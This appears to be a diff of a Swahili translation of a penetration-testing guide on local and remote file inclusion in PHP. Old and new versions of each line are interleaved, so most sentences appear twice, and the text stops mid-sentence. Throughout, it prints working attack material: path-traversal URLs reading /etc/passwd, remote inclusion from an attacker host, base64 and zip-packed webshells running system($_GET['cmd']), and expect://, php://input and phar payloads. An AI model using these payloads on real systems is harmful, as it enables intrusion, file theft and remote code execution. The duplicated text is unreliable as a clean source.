Unaweza kutumia encoding zisizo za kawaida kama double URL encode (na nyingine):
Unaweza kutumia kodishaji zisizo za kawaida kama double URL encode (na nyingine):
```
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
@ -80,42 +80,42 @@ http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
```
### Kutoka kwenye folda iliyopo
Huenda back-end inakagua njia ya folda:
Labda back-end inakagua njia ya folda:
```python
http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
```
### Kuchunguza Saraka za Mfumo wa Faili kwenye Seva
### Kuchunguza Saraka za Mfumo wa Faili kwenye Server
Mfumo wa faili wa seva unaweza kuchunguzwa kwa njia ya kurudia ili kubaini saraka, si faili tu, kwa kutumia mbinu fulani. Mchakato huu unahusisha kubaini kina cha saraka na kujaribu kuwepo kwa folda maalum. Hapa chini ni njia ya kina ya kufanikisha hili:
Mfumo wa faili wa server unaweza kuchunguzwa kwa njia ya kurudia ili kubaini saraka, sio tu faili, kwa kutumia mbinu fulani. Mchakato huu unahusisha kubaini kina cha saraka na kuchunguza kuwepo kwa folda maalum. Hapa chini kuna njia ya kina ya kufanikisha hili:
1. **Tambua Kina cha Saraka:** Bainisha kina cha saraka unayotumia kwa kupata kwa mafanikio faili ya `/etc/passwd` (inayotumika ikiwa seva ni ya Linux). Mfano wa URL unaweza kuundwa kama ifuatavyo, ukionyesha kina cha tatu:
1. **Determine Directory Depth:** Tambua kina cha saraka yako ya sasa kwa kupata kwa mafanikio faili ya `/etc/passwd` (inatumika ikiwa server ni Linux-based). Mfano wa URL unaweza kuundwa kama ifuatavyo, ukiashiria kina cha tatu:
```bash
http://example.com/index.php?page=../../../etc/passwd # depth of 3
```
2. **Chunguza Folda:** Ongeza jina la folda unayoshuku (mfano, `private`) kwenye URL, kisha rudi kwenye `/etc/passwd`. Ngazi ya ziada ya directory inahitaji kuongeza kina kwa moja:
2. **Probe for Folders:** Ongeza jina la folda inayoshukiwa (kwa mfano, `private`) kwenye URL, kisha rudi kwa `/etc/passwd`. Ngazi ya directory ya ziada inahitaji kuongeza depth kwa moja:
```bash
http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4
```
3. **Tafsiri Matokeo:** Majibu ya server yanaonyesha ikiwa saraka ipo:
- **Hitilafu / Hakuna Matokeo:** Saraka `private` huenda haipo katika eneo lililotajwa.
- **Maudhui ya `/etc/passwd`:** Uwepo wa saraka ya `private` unathibitishwa.
4. **Uchunguzi wa Rekursivu:** Saraka zilizogunduliwa zinaweza kuchunguzwa zaidi kwa kuangalia saraka ndogo au faili kwa kutumia mbinu ile ile au mbinu za kimila za Local File Inclusion (LFI).
3. **Tafsiri Matokeo:** Jibu la server linaonyesha kama folda ipo:
- **Error / No Output:** Inawezekana folda `private` haipo mahali ulioletwa.
- **Contents of `/etc/passwd`:** Uwepo wa folda `private` umethibitishwa.
4. **Uchunguzi Rekursivu:** Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa folda ndogo au faili kwa kutumia mbinu ile ile au mbinu za kawaida za Local File Inclusion (LFI).
Ili kuchunguza directories katika maeneo tofauti ya mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama `/var/www/` ina saraka ya `private` (kwa kuzingatia kwamba saraka ya sasa iko katika kina cha 3), tumia:
Kwa kuchunguza folda katika maeneo tofauti ya mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama `/var/www/` ina folda `private` (ikiwa current directory iko kwa kina cha 3), tumia:
```bash
http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
```
### **Path Truncation Technique**
Path truncation ni mbinu inayotumika kubadilisha njia za faili katika programu za wavuti. Mara nyingi hutumiwa kufikia faili zilizozuiliwa kwa kupita hatua za usalama ambazo zinaongeza herufi au alama mwishoni mwa njia za faili. Lengo ni kutengeneza njia ya faili ambayo, mara itakaporudishwa au kuharibiwa na hatua ya usalama, bado itaonyesha kwenye faili linalotakiwa.
Path truncation ni mbinu inayotumiwa kubadilisha njia za faili katika maombi ya wavuti. Mara nyingi hutumika kufikia faili zilizozuiliwa kwa kuruka hatua fulani za usalama ambazo zinaongeza alama za ziada mwishoni mwa njia za faili. Lengo ni kuunda njia ya faili ambayo, mara itakapo badilishwa na hatua ya usalama, bado itaelekeza kwenye faili inayotakiwa.
Katika PHP, uwakilishi tofauti wa njia ya faili unaweza kutazamwa kuwa sawa kutokana na tabia ya mfumo wa faili. Kwa mfano:
Katika PHP, uwakilishi mbalimbali wa njia ya faili unaweza kuzingatiwa sawa kutokana na asili ya mfumo wa faili. Kwa mfano:
- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, na `/etc/passwd/` zote huhesabiwa kama njia ile ile.
- Wakati herufi 6 za mwisho ni `passwd`, kuongeza `/` (kufanya kuwa `passwd/`) hakubadilishi faili linalolengwa.
- Vivyo hivyo, ikiwa `.php` imeambatanishwa na njia ya faili (kama `shellcode.php`), kuongeza `/.` mwishoni haitabadili faili inayofunguliwa.
- `/etc/passwd`, `/etc//passwd`, `/etc/./passwd`, and `/etc/passwd/` zote zinachukuliwa kuwa njia moja.
- Wakati herufi 6 za mwisho ni `passwd`, kuongezea a `/` (kufanya `passwd/`) hakubadilishi faili inayolengwa.
- Vivyo vivyo, ikiwa `.php` inaongezwa kwenye njia ya faili (kwa mfano `shellcode.php`), kuongeza `/.` mwishoni haitabadilishi faili inayofikiwa.
Mifano iliyoonyeshwa inaonyesha jinsi ya kutumia path truncation kufikia `/etc/passwd`, lengo la kawaida kutokana na yaliyomo nyeti (taarifa za akaunti za watumiaji):
Mifano iliyopewa inaonyesha jinsi ya kutumia path truncation kufikia `/etc/passwd`, lengo la kawaida kutokana na maudhui yake nyeti (taarifa za akaunti za watumiaji):
```
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.
@ -125,17 +125,17 @@ http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[
http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd
```
Katika matukio haya, idadi ya traversals zinazohitajika inaweza kuwa takriban 2027, lakini idadi hiyo inaweza kutofautiana kulingana na usanidi wa server.
Katika matukio haya, idadi ya traversals zinazohitajika inaweza kuwa takriban 2027, lakini nambari hii inaweza kutofautiana kulingana na usanidi wa seva.
- **Using Dot Segments and Additional Characters**: Mfululizo wa traversal (`../`) uliounganishwa na dot segments za ziada na characters unaweza kutumika kusogeza kwenye file system, kwa ufanisi kupuuza appended strings zinazoongezwa na server.
- **Determining the Required Number of Traversals**: Kupitia majaribio na makosa, mtu anaweza kupata idadi kamili ya mfululizo wa `../` zinazohitajika ili kufika kwenye root directory kisha hadi `/etc/passwd`, kuhakikisha kuwa appended strings yoyote (kama `.php`) zimekatizwa lakini path inayotakiwa (`/etc/passwd`) bado iko sawa.
- **Starting with a Fake Directory**: Ni desturi ya kawaida kuanza path na directory isiyekuwepo (kama `a/`). This technique inatumika kama hatua ya tahadhari au kutimiza mahitaji ya server ya path parsing logic.
- **Using Dot Segments and Additional Characters**: Mfululizo wa traversal (`../`) ukichanganywa na sehemu za dot za ziada na herufi unaweza kutumika kuvinjari mfumo wa faili, kwa ufanisi kupuuza mnyororo uliowekwa na seva.
- **Determining the Required Number of Traversals**: Kupitia jaribio na makosa, mtu anaweza kupata idadi kamili ya mfululizo wa `../` zinazohitajika kufika kwa directory ya mzizi na kisha kwa `/etc/passwd`, kuhakikisha kwamba nyongeza yoyote iliyowekwa (kama `.php`) inafutwa lakini njia inayotakiwa (`/etc/passwd`) inabaki sawa.
- **Starting with a Fake Directory**: Ni desturi ya kawaida kuanza njia na directory isiyo ya kweli (kama `a/`). Mbinu hii hutumika kama tahadhari au kutimiza mahitaji ya mantiki ya seva ya kuchanganua njia.
When employing path truncation techniques, it's crucial to understand the server's path parsing behavior and filesystem structure. Each scenario might require a different approach, and testing is often necessary to find the most effective method.
Unapotumia path truncation techniques, ni muhimu kuelewa tabia ya seva ya kuchanganua njia na muundo wa filesystem. Kila hali inaweza kuhitaji mbinu tofauti, na mara nyingi upimaji unahitajika kugundua mbinu yenye ufanisi zaidi.
**This vulnerability was corrected in PHP 5.3.**
**Udhaifu huu ulirekebishwa katika PHP 5.3.**
### **Filter bypass tricks**
### **Njia za kuzunguka kichujio**
```
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
@ -145,45 +145,45 @@ http://example.com/index.php?page=PhP://filter
```
## Remote File Inclusion
Katika php hii imezimwa kwa chaguo-msingi kwa sababu **`allow_url_include`** iko **Off.** Inatakiwa iwe **On** ili ifanye kazi, na katika hali hiyo unaweza kujumuisha faili la PHP kutoka kwenye seva yako na kupata RCE:
Katika php hii imezimwa kwa chaguo-msingi kwa sababu **`allow_url_include`** iko **Off.** Inapaswa kuwa **On** ili ifanye kazi, na katika kesi hiyo unaweza kujumuisha faili ya PHP kutoka kwenye server yako na kupata RCE:
```python
http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php
```
Iwapo kwa sababu fulani **`allow_url_include`** iko **On**, lakini PHP **inachuja** ufikiaji wa kurasa za nje, [kulingana na chapisho hiki](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), unaweza kutumia kwa mfano data protocol na base64 ku-decode PHP code ya b64 na kupata RCE:
Ikiwa kwa sababu fulani **`allow_url_include`** iko **On**, lakini PHP ina **filtering** ya upatikanaji wa kurasa za nje, [kulingana na chapisho hili](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64/), unaweza kutumia kwa mfano data protocol pamoja na base64 ili ku-decoda msimbo wa PHP wa b64 na kupata RCE:
```
PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt
```
> [!TIP]
> Katika code iliyotangulia, `+.txt` ya mwisho iliongezwa kwa sababu attacker alikuwa anahitaji mnyororo uliomalizika na `.txt`, hivyo mnyororo unamalizika nayo na baada ya b64 decode sehemu hiyo itarudisha tu taka na PHP code halisi itajumuishwa (na kwa hiyo, itatekelezwa).
> Katika code iliyotangulia, `+.txt` ya mwisho iliongezwa kwa sababu mshambulizi alihitaji string ambayo ilihitimisha kwa `.txt`, kwa hivyo string inahitimisha nayo na baada ya b64 decode sehemu hiyo itarudisha takataka tu na PHP code halisi itajumuishwa (na kwa hiyo, itatekelezwa).
Mfano mwingine **usiotumia `php://` protocol** ni:
Mfano mwingine **usiotumia `php://` protocol** ungekuwa:
```
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt
```
## Kipengele cha mzizi cha Python
## Elementi ya Root ya Python
Katika Python, katika msimbo kama huu:
```python
# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)
```
Ikiwa mtumiaji atapitisha **njia kamili** kwa **`file_name`**, **njia iliyotangulia itaondolewa tu**:
Ikiwa mtumiaji atatoa **absolute path** kwa **`file_name`**, **previous path** inafutwa tu:
```python
os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'
```
Hii ni tabia iliyokusudiwa kulingana na [the docs](https://docs.python.org/3.10/library/os.path.html#os.path.join):
> Ikiwa sehemu ni njia kamili (absolute path), vipengele vyote vya awali vinatupwa na kuunganishwa kunaendelea kutoka kwenye sehemu ya njia kamili.
> Ikiwa sehemu ni njia kamili, sehemu zote zilizotangulia zinatupwa na kuunganisha kunaendelea kutoka kwenye sehemu ya njia kamili.
## Java Orodha za direktori
## Java Orodhesha madirektori
Inaonekana kwamba ikiwa una Path Traversal katika Java na unaomba **direktori** badala ya faili, **orodha ya direktori itarudishwa**. Hii haitatokea katika lugha nyingine (afaik).
Inaonekana kwamba ikiwa una Path Traversal katika Java na unauliza **folda** badala ya faili, **orodha ya folda itarudishwa**. Hii haitatokee katika lugha nyingine (kwa kadiri ninavyojua).
## Vigezo 25 Bora
## Vigezo 25 vya Juu
Hapa kuna orodha ya vigezo 25 bora ambavyo vinaweza kuwa nyeti kwa local file inclusion (LFI) vulnerabilities (from [link](https://twitter.com/trbughunters/status/1279768631845494787)):
Hapa kuna orodha ya vigezo 25 vya juu ambavyo vinaweza kuwa dhaifu kwa local file inclusion (LFI) (kutoka [link](https://twitter.com/trbughunters/status/1279768631845494787)):
```
?cat={payload}
?dir={payload}
@ -211,38 +211,38 @@ Hapa kuna orodha ya vigezo 25 bora ambavyo vinaweza kuwa nyeti kwa local file in
?mod={payload}
?conf={payload}
```
## LFI / RFI using PHP wrappers & protocols
## LFI / RFI kutumia PHP wrappers & protocols
### php://filter
PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko ya data** kabla ya kusomwa au kuandikwa. Kuna makundi 5 ya filters:
PHP filters zinaruhusu kufanya operesheni za msingi za **mabadiliko kwenye data** kabla ya data kusomwa au kuandikwa. Kuna aina 5 za filters:
- [String Filters](https://www.php.net/manual/en/filters.string.php):
- `string.rot13`
- `string.toupper`
- `string.tolower`
- `string.strip_tags`: Ondoa tags kutoka kwa data (kila kitu kati ya herufi "<" na ">" chars)
- Note that this filter has disappear from the modern versions of PHP
- `string.strip_tags`: Ondoa tags kutoka kwenye data (kila kitu kati ya "<" na ">" chars)
- Kumbuka kuwa chujio hiki kimeondoka katika matoleo ya kisasa ya PHP
- [Conversion Filters](https://www.php.net/manual/en/filters.convert.php)
- `convert.base64-encode`
- `convert.base64-decode`
- `convert.quoted-printable-encode`
- `convert.quoted-printable-decode`
- `convert.iconv.*` : Inabadilisha kwa encoding tofauti (`convert.iconv.<input_enc>.<output_enc>`). Ili kupata **orodha ya mifumo yote ya usimbaji** zinazoungwa mkono endesha kwenye console: `iconv -l`
- `convert.iconv.*` : Hubadilisha kuwa encoding tofauti (`convert.iconv.<input_enc>.<output_enc>`). Ili kupata **orodha ya encodings zote** zinazotumika endesha kwenye console: `iconv -l`
> [!WARNING]
> Kwa kutumia vibaya filter ya `convert.iconv.*` unaweza **kuzalisha maandishi yoyote**, ambayo inaweza kuwa muhimu kuandika maandishi yoyote au kufanya function kama include kushughulikia maandishi yoyote. Kwa taarifa zaidi angalia [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
> Kwa kutumia vibaya chujio cha `convert.iconv.*` unaweza **kutengeneza maandishi yoyote**, ambayo inaweza kuwa muhimu kuandika maandishi yoyote au kufanya include process isimamie maandishi yoyote. Kwa habari zaidi angalia [**LFI2RCE via php filters**](lfi2rce-via-php-filters.md).
- [Compression Filters](https://www.php.net/manual/en/filters.compression.php)
- `zlib.deflate`: Compress the content (useful if exfiltrating a lot of info)
- `zlib.inflate`: Decompress the data
- [Encryption Filters](https://www.php.net/manual/en/filters.encryption.php)
- `mcrypt.*` : Imepitwa na wakati
- `mdecrypt.*` : Imepitwa na wakati
- `mcrypt.*` : Deprecated
- `mdecrypt.*` : Deprecated
- Other Filters
- Ukirusha katika php `var_dump(stream_get_filters());` utaona couple ya **filters zisizotarajiwa**:
- Ukiendesha katika php `var_dump(stream_get_filters());` utaona baadhi ya **vichujio visivyotarajiwa**:
- `consumed`
- `dechunk`: reverses HTTP chunked encoding
- `dechunk`: inarudisha nyuma HTTP chunked encoding
- `convert.*`
```php
# String Filters
@ -271,39 +271,39 @@ readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)
```
> [!WARNING]
> Sehemu "php://filter" haizingati tofauti kati ya herufi kubwa na ndogo
> Sehemu "php://filter" haizingatii tofauti za herufi
### Kutumia php filters kama oracle kusoma faili yoyote
[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) imependekezwa mbinu ya kusoma faili ya ndani bila kupata output ikirudi kutoka kwa server. Mbinu hii inategemea boolean exfiltration ya faili (char kwa char) ikitumia php filters kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kufanya text iwe kubwa vya kutosha ili kusababisha php itoke exception.
[**In this post**](https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle) inapendekeza mbinu ya kusoma faili ya ndani bila server kurudisha yaliyomo. Mbinu hii inategemea **boolean exfiltration of the file (char by char) using php filters** kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kuongeza maandishi kiasi cha kutosha kushinikiza php kutoa hitilafu.
Katika postu ya asili utaona maelezo ya kina ya mbinu, lakini hapa ni muhtasari mfupi:
Katika post ya asili unaweza kupata maelezo ya kina ya mbinu hii, lakini hapa kuna muhtasari mfupi:
- Tumia codec **`UCS-4LE`** ili kuweka herufi ya mwanzo ya maandishi mwanzoni na kufanya ukubwa wa string kuongezeka kwa namna ya eksponential.
- Hii itatumika kuzalisha text kubwa kiasi kwamba wakati herufi ya mwanzo inakadiriwa kwa usahihi php itasababisha **error**
- Filter ya **dechunk** itaondoa kila kitu ikiwa char ya kwanza si hexadecimal, hivyo tunaweza kujua ikiwa char ya kwanza ni hex.
- Hii, ikichanganywa na ile ya awali (na filters nyingine kulingana na herufi inayokadiriwa), itatuwezesha kukisia herufi mwanzoni mwa text kwa kuona tunapofanya transformations za kutosha kufanya isiwe character ya hexadecimal. Kwa kuwa ikiwa ni hex, dechunk haitaiondoa na bomu la awali litasababisha php error.
- Codec **convert.iconv.UNICODE.CP930** hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inaturuhusu kugundua ikiwa herufi ya kwanza ni `a` kwa mfano kwa kuwa ikiwa tunaweka codec hii mara 6 a->b->c->d->e->f->g herufi haitakuwa tena character ya hexadecimal, kwa hivyo dechunk haitaiondoa na php error itachocheka kwa sababu inazidisha na bomu la awali.
- Kutumia transformations nyingine kama **rot13** mwanzoni inawezekana leak chars wengine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kusogeza herufi nyingine kwa kiwango cha hex).
- Wakati char ya mwanzo ni nambari inahitajika ku-base64 encode na leak herufi 2 za kwanza ili leak nambari.
- Shida ya mwisho ni kuona **jinsi ya leak zaidi ya herufi ya mwanzo**. Kwa kutumia order memory filters kama **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** inawezekana kubadilisha mpangilio wa chars na kupata kwenye nafasi ya kwanza herufi nyingine za text.
- Na ili kuwezesha kupata **further data** wazo ni **kuzalisha 2 bytes za junk data mwanzoni** kwa **convert.iconv.UTF16.UTF16**, tumia **UCS-4LE** ili kufanya i-pivot na 2 bytes zinazofuata, na futa data hadi kufikia junk data (hii itaondoa 2 bytes za kwanza za text ya awali). Endelea kufanya hivi hadi ufikie kipande unachotaka leak.
- Tumia codec **`UCS-4LE`** kuweka herufi ya mwanzo ya maandishi mwanzoni na kufanya ukubwa wa string ukuwe kwa kiasi kinachoongezeka kwa kasi (exponentially).
- Hii itatumika kuzalisha **maandishi makubwa sana wakati herufi ya mwanzo itakaponikuliwa kwa usahihi** kiasi kwamba php itasababisha **error**.
- Filter ya **dechunk** itafuta kila kitu **ikiwa char ya kwanza si hexadecimal**, hivyo tunaweza kujua ikiwa char ya kwanza ni hex.
- Hii, ikichanganywa na iliyo hapo awali (na filters nyingine kulingana na herufi iliyokisiwa), itatuwezesha kukisia herufi mwanzoni mwa maandishi kwa kuona wakati tunapofanya mabadiliko ya kutosha kuifanya isiwe herufi ya hexadecimal. Kwa kuwa ikiwa ni hex, dechunk haitafuta na mlipuko wa awali utasababisha php error.
- Codec **convert.iconv.UNICODE.CP930** hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inaturuhusu kugundua ikiwa herufi ya kwanza ni `a` kwa mfano kwa sababu ikiwa tutaweka codec hii 6 mara a->b->c->d->e->f->g herufi haitakuwa tena tabia ya hexadecimal, kwa hivyo dechunk haitaiangusha na php error itasababisha kwa sababu inazidisha na initial bomb.
- Kwa kutumia mabadiliko mingine kama **rot13** mwanzoni inawezekana leak herufi nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kuhamisha herufi nyingine kwenye eneo la hex).
- Wakati char ya mwanzo ni namba inahitajika kui-base64 encode na leak herufi 2 za kwanza ili leak namba hiyo.
- Tatizo la mwisho ni kuona **jinsi ya leak zaidi ya herufi ya mwanzo**. Kwa kutumia order memory filters kama **convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE** inawezekana kubadilisha mpangilio wa chars na kupata mahali pa kwanza herufi nyingine za maandishi.
- Na ili kuwaze kupata **further data** wazo ni **kutengeneza 2 bytes za junk data mwanzoni** kwa kutumia **convert.iconv.UTF16.UTF16**, tumia **UCS-4LE** kuzifanya zi**pivot with the next 2 bytes**, na d**elete the data until the junk data** (hii itaondoa bytes 2 za mwanzo za maandishi ya awali). Endelea kufanya hivyo hadi utakapofikia sehemu unayotaka leak.
Katika postu pia ilifunuliwa zana ya kutekeleza hii moja kwa moja: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
Katika post pia ilileak zana ya kufanya hili moja kwa moja: [php_filters_chain_oracle_exploit](https://github.com/synacktiv/php_filter_chains_oracle_exploit).
### php://fd
Hii wrapper inaruhusu kupata access kwa file descriptors ambazo process imefungua. Inaweza kuwa muhimu ku-exfiltrate content ya opened files:
This wrapper inaruhusu kufikia file descriptors ambazo process imefungua. Inaweza kuwa muhimu ku-exfiltrate yaliyomo ya faili zilizofunguliwa:
```php
echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");
```
Unaweza pia kutumia **php://stdin, php://stdout and php://stderr** kufikia **file descriptors 0, 1 and 2** mtawalia (sijui jinsi hii ingeweza kuwa muhimu katika shambulio)
Unaweza pia kutumia **php://stdin, php://stdout and php://stderr** kufikia **file descriptors 0, 1 and 2** mtawalia (Sijui jinsi hii ingefaa katika attack)
### zip:// and rar://
Pakia faili ya Zip au Rar yenye PHPShell ndani na uifikishe.\
Ili kuweza kutumia vibaya protokoli ya rar, lazima iwe **imewezeshwa mahsusi**.
Pakia faili la Zip au Rar lenye PHPShell ndani na ufikie.\
Ili kuweza abuse the rar protocol, inahitaji **kuwezeshwa mahsusi**
```bash
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
@ -328,11 +328,11 @@ http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
Kumbuka kwamba protokoli hii imezuiwa na mipangilio ya php **`allow_url_open`** na **`allow_url_include`**
Kumbuka kwamba protokoli hii inadhibitiwa na usanidi wa php **`allow_url_open`** na **`allow_url_include`**
### expect://
Expect inapaswa kuwezeshwa. Unaweza kutekeleza code ukitumia hivi:
Expect inapaswa kuwa imewezeshwa. Unaweza kutekeleza msimbo kwa kutumia hii:
```
http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls
@ -345,7 +345,7 @@ curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system
```
### phar://
Faili ya `.phar` inaweza kutumiwa kutekeleza msimbo wa PHP wakati programu ya wavuti inapotumia kazi kama `include` kwa ajili ya kupakia faili. Kipande cha msimbo cha PHP kilichoonyeshwa hapa chini kinaonyesha uundaji wa faili ya `.phar`:
Faili la `.phar` linaweza kutumika kutekeleza PHP code wakati programu ya wavuti inapotumia function kama `include` kwa ajili ya kupakia faili. Kipande cha PHP cha chini kinaonyesha uundaji wa faili la `.phar`:
```php
<?php
$phar = new Phar('test.phar');
@ -354,15 +354,15 @@ $phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();
```
Ili kujenga faili ya `.phar`, amri ifuatayo inapaswa kutekelezwa:
Ili ku-compile faili la `.phar`, amri ifuatayo inapaswa kutekelezwa:
```bash
php --define phar.readonly=0 create_path.php
```
Wakati wa utekelezaji, faili iitwayo `test.phar` itaundwa, ambayo inaweza kutumika kuwanufaisha udhaifu wa Local File Inclusion (LFI).
Upon execution, a file named `test.phar` will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.
Katika kesi ambapo LFI inasoma tu faili bila kutekeleza PHP code iliyomo ndani, kupitia functions kama `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, au `filesize()`, inaweza kujaribu exploitation ya deserialization vulnerability. Udhaifu huu unahusishwa na kusoma faili kwa kutumia protocol ya `phar`.
Katika kesi ambapo LFI inafanya tu kusoma faili bila kutekeleza msimbo wa PHP ndani yake, kupitia functions such as `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, or `filesize()`, inaweza kujaribu exploitation ya deserialization vulnerability. Udhaifu huu unahusiana na kusoma faili kwa kutumia protocol ya `phar`.
Kwa ufafanuzi wa kina kuhusu kuwanufaisha deserialization vulnerabilities katika muktadha wa `.phar` files, rejea hati iliyounganishwa hapa chini:
For a detailed understanding of exploiting deserialization vulnerabilities in the context of `.phar` files, refer to the document linked below:
[Phar Deserialization Exploitation Guide](phar-deserialization.md)
@ -373,36 +373,36 @@ phar-deserialization.md
### CVE-2024-2961
Ilikuwa inawezekana kuabusu **any arbitrary file read from PHP that supports php filters** kupata RCE. Maelezo ya kina yanaweza [**kupatikana katika chapisho hili**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Muhtasari mfupi: **3 byte overflow** katika PHP heap ilitumiwa ku**badilisha chain ya free chunks** ya ukubwa maalum ili kuweza **kuandika chochote kwa anwani yoyote**, hivyo hook iliongezwa kuitwa **`system`**.\
Ilikuwa inawezekana ku-alloc chunks za ukubwa maalum kwa kuabusu php filters zaidi.
Ilikuwa inawezekana kutumia vibaya **any arbitrary file read from PHP that supports php filters** kupata RCE. The detailed description can be [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Muhtasari mfupi: **3 byte overflow** katika PHP heap ilitumiwa vibaya ili **alter the chain of free chunks** za ukubwa maalum ili kuweza **write anything in any address**, hivyo hook iliongezwa kuitisha **`system`**.\
Ilikuwa inawezekana ku-alloc chunks za ukubwa maalum kwa kutumia zaidi php filters.
### Protokoli zaidi
### More protocols
Angalia [ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**
Angalia zaidi[ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**
- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Andika katika memory au katika faili ya muda (sina uhakika jinsi hii inaweza kuwa muhimu katika attack ya file inclusion)
- [file://](https://www.php.net/manual/en/wrappers.file.php) — Kufikia filesystem ya ndani
- [http://](https://www.php.net/manual/en/wrappers.http.php) — Kufikia HTTP(s) URLs
- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Kufikia FTP(s) URLs
- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Compression Streams
- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Kutafuta pathnames zinazolingana na pattern (Hairejeshi kitu kinachoweza kuchapishwa, kwa hivyo sio ya maana hapa)
- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Andika katika memory au katika faili ya muda (sidhani jinsi hii inaweza kuwa muhimu katika file inclusion attack)
- [file://](https://www.php.net/manual/en/wrappers.file.php) — Kupata filesystem ya eneo
- [http://](https://www.php.net/manual/en/wrappers.http.php) — Kupata HTTP(s) URLs
- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Kupata FTP(s) URLs
- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Mtiririko ya compression
- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Find pathnames matching pattern (Hairejeshi chochote kinachoweza kuchapishwa, hivyo sio muhimu hapa)
- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — Secure Shell 2
- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Haifai kusoma faili za aina yoyote)
- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Si muhimu kusoma arbitrary files)
## LFI kupitia 'assert' ya PHP
## LFI via PHP's 'assert'
Local File Inclusion (LFI) inakuwa hatari sana katika PHP pale unaposhughulika na function ya 'assert', ambayo inaweza kutekeleza code ndani ya strings. Hii ni tatizo hasa ikiwa input yenye characters za directory traversal kama ".." inachunguzwa lakini haitakaswi ipasavyo.
Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa wakati wa kushughulikia function ya 'assert', ambayo inaweza kutekeleza msimbo ndani ya strings. Hii ni tatizo hasa ikiwa input inayojumuisha characters za directory traversal kama ".." inakaguliwa lakini haijasafishwa ipasavyo.
Kwa mfano, PHP code inaweza kutengenezwa kuzuia directory traversal kama ifuatavyo:
Kwa mfano, msimbo wa PHP unaweza kubuniwa kuzuia directory traversal kama ifuatavyo:
```bash
assert("strpos('$file', '..') === false") or die("");
```
Ingawa hili linakusudia kuzuia traversal, kwa bahati mbaya linaumba vector kwa code injection. To exploit this kwa kusoma yaliyomo kwenye faili, attacker angeweza kutumia:
